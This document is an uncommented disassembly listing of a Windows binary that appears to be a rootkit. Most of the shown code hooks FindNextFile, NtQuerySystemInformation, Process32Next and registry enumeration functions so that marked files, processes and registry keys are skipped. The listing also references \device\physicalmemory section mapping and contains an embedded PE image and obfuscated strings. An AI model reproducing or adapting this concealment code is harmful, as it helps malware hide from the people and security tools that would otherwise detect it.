dd offset loc_401E6D
dd offset loc_401F8A
dd offset loc_401E8E
dd offset loc_401E8E
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DEC
dd offset loc_401DEC
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
off_43B6D4 dd offset loc_401FD3 ; DATA XREF: sub_401D14+29E�r
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FD3
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FD3
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B863: ; CODE XREF: .data:0043B8AC�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BA70h
test eax, eax
jz short loc_43B8AE
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B87D: ; CODE XREF: .data:0043B883�j
cmp byte ptr [ebx], 0
jz short loc_43B885
inc ebx
jmp short loc_43B87D
; ---------------------------------------------------------------------------
loc_43B885: ; CODE XREF: .data:0043B880�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC4A6h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43B8AB
popa
jmp short loc_43B8AE
; ---------------------------------------------------------------------------
loc_43B8AB: ; CODE XREF: .data:0043B8A6�j
popa
jmp short loc_43B863
; ---------------------------------------------------------------------------
loc_43B8AE: ; CODE XREF: .data:0043B870�j
; .data:0043B8A9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B8E4: ; CODE XREF: .data:0043B933�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BAF1h
test eax, eax
jz short loc_43B935
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B8FE: ; CODE XREF: .data:0043B906�j
cmp word ptr [ebx], 0
jz short loc_43B908
inc ebx
inc ebx
jmp short loc_43B8FE
; ---------------------------------------------------------------------------
loc_43B908: ; CODE XREF: .data:0043B902�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C62Dh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43B932
popa
jmp short loc_43B935
; ---------------------------------------------------------------------------
loc_43B932: ; CODE XREF: .data:0043B92D�j
popa
jmp short loc_43B8E4
; ---------------------------------------------------------------------------
loc_43B935: ; CODE XREF: .data:0043B8F1�j
; .data:0043B930�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43B948 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043BE94�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43B965: ; DATA XREF: .data:0043BE9C�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245BB9Bh
mov [ebp-4], eax
cmp esi, 5
jz short loc_43B9B5
loc_43B9A1: ; CODE XREF: .data:0043B9BB�j
; .data:0043BA0E�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43B9B5: ; CODE XREF: .data:0043B99F�j
cmp edi, 1F40h
jle short loc_43B9A1
jmp short loc_43B9C3
; ---------------------------------------------------------------------------
loc_43B9BF: ; CODE XREF: .data:0043BA10�j
mov esi, ebx
loc_43B9C1: ; CODE XREF: .data:0043BA08�j
add ebx, eax
loc_43B9C3: ; CODE XREF: .data:0043B9BD�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43B9D1: ; CODE XREF: .data:0043B9E4�j
bt eax, ebx
jb short loc_43B9DC
mov byte ptr [esp+ebx], 30h
jmp short loc_43B9E0
; ---------------------------------------------------------------------------
loc_43B9DC: ; CODE XREF: .data:0043B9D4�j
mov byte ptr [esp+ebx], 31h
loc_43B9E0: ; CODE XREF: .data:0043B9DA�j
inc ebx
cmp ebx, 20h
jnz short loc_43B9D1
push esp
call near ptr 0C4FC5F8h
add esp, 24h
test ax, ax
jnz short loc_43B9F7
popa
jmp short loc_43BA0A
; ---------------------------------------------------------------------------
loc_43B9F7: ; CODE XREF: .data:0043B9F2�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43BA06
mov dword ptr [esi], 0
jmp short loc_43BA0A
; ---------------------------------------------------------------------------
loc_43BA06: ; CODE XREF: .data:0043B9FC�j
add [esi], eax
jmp short loc_43B9C1
; ---------------------------------------------------------------------------
loc_43BA0A: ; CODE XREF: .data:0043B9F5�j
; .data:0043BA04�j
mov eax, [ebx]
test eax, eax
jz short loc_43B9A1
jmp short loc_43B9BF
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43BE84�o
word_43BA26 dw 8360h ; DATA XREF: .data:off_43BE8C�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43BA6E: ; CODE XREF: .data:0043BABC�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245BC85h
test eax, eax
jz short loc_43BABE
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43BA95: ; CODE XREF: .data:0043BAA8�j
bt eax, ebx
jb short loc_43BAA0
mov byte ptr [esp+ebx], 30h
jmp short loc_43BAA4
; ---------------------------------------------------------------------------
loc_43BAA0: ; CODE XREF: .data:0043BA98�j
mov byte ptr [esp+ebx], 31h
loc_43BAA4: ; CODE XREF: .data:0043BA9E�j
inc ebx
cmp ebx, 20h
jnz short loc_43BA95
push esp
call near ptr 0C4FC6BCh
add esp, 24h
test ax, ax
jnz short loc_43BABB
popa
jmp short loc_43BABE
; ---------------------------------------------------------------------------
loc_43BABB: ; CODE XREF: .data:0043BAB6�j
popa
jmp short loc_43BA6E
; ---------------------------------------------------------------------------
loc_43BABE: ; CODE XREF: .data:0043BA85�j
; .data:0043BAB9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BAE4: ; CODE XREF: .data:0043BB31�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BCF7h
test eax, eax
jnz short loc_43BB33
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BAFF: ; CODE XREF: .data:0043BB05�j
cmp byte ptr [ebx], 0
jz short loc_43BB07
inc ebx
jmp short loc_43BAFF
; ---------------------------------------------------------------------------
loc_43BB07: ; CODE XREF: .data:0043BB02�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC728h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BB2D
popa
jmp short loc_43BB33
; ---------------------------------------------------------------------------
loc_43BB2D: ; CODE XREF: .data:0043BB28�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BAE4
; ---------------------------------------------------------------------------
loc_43BB33: ; CODE XREF: .data:0043BAF7�j
; .data:0043BB2B�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BB4C: ; CODE XREF: .data:0043BB9F�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BD5Fh
test eax, eax
jnz short loc_43BBA1
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BB67: ; CODE XREF: .data:0043BB6F�j
cmp word ptr [ebx], 0
jz short loc_43BB71
inc ebx
inc ebx
jmp short loc_43BB67
; ---------------------------------------------------------------------------
loc_43BB71: ; CODE XREF: .data:0043BB6B�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C896h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BB9B
popa
jmp short loc_43BBA1
; ---------------------------------------------------------------------------
loc_43BB9B: ; CODE XREF: .data:0043BB96�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BB4C
; ---------------------------------------------------------------------------
loc_43BBA1: ; CODE XREF: .data:0043BB5F�j
; .data:0043BB99�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43BBA8 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; ---------------------------------------------------------------------------
loc_43BBB9: ; DATA XREF: .data:0043BEEC�o
push ebp
mov ebp, esp
loc_43BBBC: ; CODE XREF: .data:0043BC37�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BBCA
push dword ptr [eax]
loc_43BBCA: ; CODE XREF: .data:0043BBC6�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BDE9h
test eax, eax
jnz short loc_43BC39
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BBF1: ; CODE XREF: .data:0043BBF9�j
cmp word ptr [ebx], 0
jz short loc_43BBFB
inc ebx
inc ebx
jmp short loc_43BBF1
; ---------------------------------------------------------------------------
loc_43BBFB: ; CODE XREF: .data:0043BBF5�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C920h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BC25
popa
jmp short loc_43BC39
; ---------------------------------------------------------------------------
loc_43BC25: ; CODE XREF: .data:0043BC20�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC32
pop dword ptr [eax]
loc_43BC32: ; CODE XREF: .data:0043BC2E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BBBC
; ---------------------------------------------------------------------------
loc_43BC39: ; CODE XREF: .data:0043BBE9�j
; .data:0043BC23�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BC45
add esp, 4
loc_43BC45: ; CODE XREF: .data:0043BC40�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BC60: ; CODE XREF: .data:0043BCD5�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC6E
push dword ptr [eax]
loc_43BC6E: ; CODE XREF: .data:0043BC6A�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BE8Dh
test eax, eax
jnz short loc_43BCD7
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BC95: ; CODE XREF: .data:0043BC9B�j
cmp byte ptr [ebx], 0
jz short loc_43BC9D
inc ebx
jmp short loc_43BC95
; ---------------------------------------------------------------------------
loc_43BC9D: ; CODE XREF: .data:0043BC98�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC8BEh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BCC3
popa
jmp short loc_43BCD7
; ---------------------------------------------------------------------------
loc_43BCC3: ; CODE XREF: .data:0043BCBE�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BCD0
pop dword ptr [eax]
loc_43BCD0: ; CODE XREF: .data:0043BCCC�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BC60
; ---------------------------------------------------------------------------
loc_43BCD7: ; CODE XREF: .data:0043BC8D�j
; .data:0043BCC1�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BCE3
add esp, 4
loc_43BCE3: ; CODE XREF: .data:0043BCDE�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43BCE8 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43BCFB: ; DATA XREF: .data:0043BF0C�o
push ebp
mov ebp, esp
loc_43BCFE: ; CODE XREF: .data:0043BD79�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD0C
push dword ptr [eax]
loc_43BD0C: ; CODE XREF: .data:0043BD08�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BF2Bh
test eax, eax
jnz short loc_43BD7B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BD33: ; CODE XREF: .data:0043BD3B�j
cmp word ptr [ebx], 0
jz short loc_43BD3D
inc ebx
inc ebx
jmp short loc_43BD33
; ---------------------------------------------------------------------------
loc_43BD3D: ; CODE XREF: .data:0043BD37�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50CA62h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BD67
popa
jmp short loc_43BD7B
; ---------------------------------------------------------------------------
loc_43BD67: ; CODE XREF: .data:0043BD62�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD74
pop dword ptr [eax]
loc_43BD74: ; CODE XREF: .data:0043BD70�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BCFE
; ---------------------------------------------------------------------------
loc_43BD7B: ; CODE XREF: .data:0043BD2B�j
; .data:0043BD65�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BD87
add esp, 4
loc_43BD87: ; CODE XREF: .data:0043BD82�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BDA2: ; CODE XREF: .data:0043BE17�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BDB0
push dword ptr [eax]
loc_43BDB0: ; CODE XREF: .data:0043BDAC�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BFCFh
test eax, eax
jnz short loc_43BE19
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BDD7: ; CODE XREF: .data:0043BDDD�j
cmp byte ptr [ebx], 0
jz short loc_43BDDF
inc ebx
jmp short loc_43BDD7
; ---------------------------------------------------------------------------
loc_43BDDF: ; CODE XREF: .data:0043BDDA�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FCA00h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BE05
popa
jmp short loc_43BE19
; ---------------------------------------------------------------------------
loc_43BE05: ; CODE XREF: .data:0043BE00�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BE12
pop dword ptr [eax]
loc_43BE12: ; CODE XREF: .data:0043BE0E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BDA2
; ---------------------------------------------------------------------------
loc_43BE19: ; CODE XREF: .data:0043BDCF�j
; .data:0043BE03�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BE25
add esp, 4
loc_43BE25: ; CODE XREF: .data:0043BE20�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402A4D+45D�o
; .data:off_43BE88�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_40223C+E�o
; .data:0043BE98�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043BEE8�o
; .data:0043BF08�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43BE84 dd offset aProcess32next ; DATA XREF: sub_402A4D+CF�r
; sub_402A4D+102�r ...
; "Process32Next"
off_43BE88 dd offset aKernel32_dll ; DATA XREF: sub_402A4D+B0�r
; "kernel32.dll"
off_43BE8C dd offset word_43BA26 ; DATA XREF: sub_4028A6+193�r
byte_43BE90 db 0 ; DATA XREF: sub_402A4D+76�r
; sub_402A4D+93�r
align 4
dd offset dword_43B948+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43B965
dd 1, 43B8C5h, 43BE2Fh, 43B8D3h, 1, 43B844h, 43BE2Fh, 43B852h
dd 2, 43BB3Dh, 43BE46h, 43BB49h, 1, 43BAD5h, 43BE46h, 43BAE1h
dd 0
dd offset dword_43BBA8+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BBB9
dd 1, 43BC4Fh, 43BE46h, 43BC5Dh, 0
dd offset dword_43BCE8+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BCFB
dd 1, 43BD91h, 43BE46h, 43BD9Fh, 5 dup(0)
dd 4
dword_43BF38 dd 0Ah dword_43BF3C dd 0 ; .text:loc_4021CD�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_40223C+25�o
dd offset dword_417644+607h
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_40223C+3A�o
aNVH2 db 'N-v%H|2',0
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_40223C+4F�o
aZE db 'z>e',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_40223C+6B�o
aFpidy db 'FpIdY ',0
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_40223C+7B�o
aE1qf db 'e`1qF',0
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_4022CC+C8�o
aDevicePhysical: ; DATA XREF: sub_4022CC+2D�o
unicode 0, <\device\physicalmemory>,0
aA_utc2 db '_utc*2',0 ; DATA XREF: sub_40223C+1D�o
aHgtr db 'hgtr',0 ; DATA XREF: sub_4022CC+20�o
aQOkgoj db 'Q!okgOJ',0 ; DATA XREF: sub_4022CC+3F�o
dword_43C00F dd 802036h aXghyb_v db 'Xhyb.',0 ; DATA XREF: sub_4022CC+A5�o
align 4
dw 8
unicode 0, <>,0
dword_43C020 dd 0Bh ; sub_402A4D+5FA�r
dword_43C024 dd 0 ; .text:loc_402509�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43C0B8�o
aHtons db 'htons',0
align 2
aVirtualprotect db 'VirtualProtect',0
align 2
aGetcurrentproc db 'GetCurrentProcessId',0
aFindwindowa db 'FindWindowA',0
aSendmessagea db 'SendMessageA',0
a3 db '3&<',0
aIsbadreadptr db 'IsBadReadPtr',0
aNgwn db ' nGwn',0
aGlobalfindatom db 'GlobalFindAtomA',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
aRW db '*r',27h,'w<#',0
align 4
byte_43C0B4 db 3 ; DATA XREF: sub_402572+B0�r
align 4
off_43C0B8 dd offset aWcscmp ; DATA XREF: sub_402572+137�r
; sub_402572+19F�r
; "wcscmp"
off_43C0BC dd offset aNtdll_dll ; DATA XREF: sub_402572+124�r
; "ntdll.dll"
dd 5, 43C02Fh, 43BE6Dh, 7, 43C036h, 43BE2Fh, 8, 43C046h
dd 43BE2Fh, 9, 43C05Ah, 43BE79h, 0Ah, 43C066h, 43BE79h
dd 0Bh, 43C077h, 43BE2Fh, 0Ch, 43C08Ah, 43BE2Fh, 0Dh, 43C09Ah
dd 43BE2Fh
aA9s db 'A^9S',0 ; DATA XREF: sub_402572+26C�o
dword_43C125 dd 27603Dh word_43C129 dw 81h ; DATA XREF: sub_402A4D+110�r
aTzT6 db 'tz|&>T6',0 ; DATA XREF: sub_402A4D+17B�o
word_43C133 dw 82h ; DATA XREF: sub_402A4D+1D3�r
aLj0yrfp db 'lJ0YrFP',0 ; DATA XREF: sub_402A4D+2C0�o
word_43C13D dw 5Eh ; DATA XREF: sub_402A4D+370�r
byte_43C13F db 2Dh ; DATA XREF: sub_402A4D+722�o
db 64h, 0
dword_43C142 dd 204359h aLvdw_x db 'LVDW.X',0 ; DATA XREF: sub_402A4D+761�o
dword_43C14D dd 4B5258h align 4
dd 3, 10h
dword_43C15C dd 6 ; sub_4032E7:loc_403316�r ...
dword_43C160 dd 30643C7Fh db 0
byte_43C165 db 49h, 69h, 0 ; DATA XREF: sub_403383+4F�o
dword_43C168 dd 3D7258h aOqd db ' OQD',0 ; DATA XREF: sub_403449+3C�o
aR6 db 'R6',0 ; DATA XREF: sub_4034D8+19�o
dd 5
dword_43C178 dd 0Bh dword_43C17C dd 0 ; sub_40357C:loc_4035AA�r ...
word_43C180 dw 68h ; DATA XREF: sub_403610+18�r
word_43C182 dw 0 ; DATA XREF: sub_4036F2+11�o
dd 1, 0Dh
dword_43C18C dd 0 ; sub_40375C:loc_40378A�r ...
byte_43C190 db 3Eh, 80h, 0 ; DATA XREF: sub_4037EF+17�o
word_43C193 dw 2Fh ; DATA XREF: sub_4037EF+33�r
aH8me db 'H8mE',0 ; DATA XREF: .text:0040389F�o
align 10h
dd 0Eh
dword_43C1A4 dd 0E5h ; sub_403936:loc_40396B�r ...
dword_43C1A8 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43C5C8 proc near ; CODE XREF: .data:0043C6F0�p
; .data:0043C71E�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43C5E5: ; CODE XREF: sub_43C5C8+44�j
; sub_43C5C8+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43C614
cmp esi, [esp+1Ch+arg_4]
jz short loc_43C614
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43C5E5
call dword ptr [ebx+esi*4+8]
jmp short loc_43C5E5
; ---------------------------------------------------------------------------
loc_43C614: ; CODE XREF: sub_43C5C8+2A�j
; sub_43C5C8+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43C5C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C622 proc near ; CODE XREF: .data:0043C6E3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43CCBC
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43C622 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43C717
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
